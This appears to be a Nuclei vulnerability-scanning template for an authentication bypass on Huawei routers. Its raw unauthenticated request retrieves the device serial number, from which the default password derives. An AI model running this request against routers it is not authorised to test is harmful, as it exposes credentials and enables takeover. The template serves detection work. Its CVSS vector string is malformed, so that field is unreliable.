id: huawei-router-auth-bypass

info:
  name: Huawei Router - Authentication Bypass
  author: gy741
  severity: critical
  description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device.
  reference:
    - https://www.exploit-db.com/exploits/48310
  classification:
    cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-288
  tags: auth-bypass,router,edb,huawei

requests:
  - raw:
      - |
        GET /api/system/deviceinfo HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Referer: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "DeviceName"
          - "SerialNumber"
          - "HardwareVersion"
        condition: and

# Enhanced by mp on 2022/06/03